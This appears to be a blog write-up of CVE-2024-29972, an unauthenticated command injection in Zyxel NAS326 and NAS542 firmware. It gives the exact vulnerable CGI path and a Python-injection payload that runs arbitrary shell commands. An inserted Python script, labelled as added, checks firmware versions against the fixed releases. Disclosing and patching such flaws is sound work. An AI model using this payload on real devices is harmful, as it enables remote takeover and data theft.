Yupy Syntax

CVE-2024-29972 - Write Up



This time I will share an article about findings I found on a website that is vulnerable to CVE-2024-29972. Okay, let’s get straight to it.

Vulnerability Details:

A command injection vulnerability exists in the remote_help-cgi component of Zyxel NAS326 firmware versions prior to V5.21(AAZF.17)C0 and NAS542 firmware versions prior to V5.21(ABAG.14)C0. This flaw could potentially allow unauthenticated attackers to run arbitrary operating system commands by submitting a specially crafted HTTP POST request.
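To check an inventory against the fixed releases named above, the following added example (not part of the original write-up, and not Zyxel code) parses the firmware strings and compares them numerically. The version-string layout and its ordering are assumptions inferred from the two version strings quoted above, and the host names and inventory are constructed.

```python
import re

# Fixed firmware releases, as stated in the vulnerability details above.
FIXED = {
    "NAS326": "V5.21(AAZF.17)C0",
    "NAS542": "V5.21(ABAG.14)C0",
}

# Assumed layout: V<major>.<minor>(<model code>.<patch>)C<revision>
_VERSION_RE = re.compile(r"^V(\d+)\.(\d+)\(([A-Z]{4})\.(\d+)\)C(\d+)$")


def parse_firmware(version):
    """Return (model_code, sortable_tuple); raise ValueError on other formats."""
    m = _VERSION_RE.match(version.strip())
    if not m:
        raise ValueError(f"unrecognised firmware string: {version!r}")
    major, minor, code, patch, rev = m.groups()
    # Integers, so that patch 9 sorts below patch 14 (a string compare would not).
    return code, (int(major), int(minor), int(patch), int(rev))


def assess(model, version):
    """Classify one device as 'vulnerable', 'fixed' or 'unknown'."""
    fixed = FIXED.get(model.upper())
    if fixed is None:
        return "unknown"  # model is not one of the two named above
    try:
        code, have = parse_firmware(version)
    except ValueError:
        return "unknown"  # do not guess; route to manual review
    fixed_code, need = parse_firmware(fixed)
    if code != fixed_code:
        return "unknown"  # firmware train does not match the reported model
    return "vulnerable" if have < need else "fixed"


def audit(inventory):
    """Map each host name to its assessment."""
    return {host: assess(model, ver) for host, model, ver in inventory}


# Constructed sample inventory (hypothetical hosts, not real devices).
INVENTORY = [
    ("nas-a", "NAS326", "V5.21(AAZF.16)C0"),
    ("nas-b", "NAS326", "V5.21(AAZF.17)C0"),
    ("nas-c", "NAS542", "V5.21(ABAG.9)C0"),
    ("nas-d", "NAS542", "5.21-beta"),
]

if __name__ == "__main__":
    for host, status in audit(INVENTORY).items():
        print(f"{host}: {status}")
```

Devices reported as "unknown" have a firmware string or model that does not fit the assumed layout and should be checked by hand rather than treated as patched.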

CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Proof of Concept (PoC):

  • Vulnerability Path
/desktop,/cgi-bin/remote_help-cgi/favicon.ico?type=sshd_tdc
  • Payload
c0=storage_ext_cgi CGIGetExtStoInfo None) and False or __import__("subprocess").check_output("{COMMAND}", shell=True)#

Impact:

The most severe impact of this vulnerability is the potential for an unauthenticated attacker to gain remote control over the affected device. By executing arbitrary operating system commands, the attacker could manipulate system files, install malicious software, extract sensitive data, or disrupt the functionality of the device, which could lead to a complete system compromise and unauthorized access to the network.
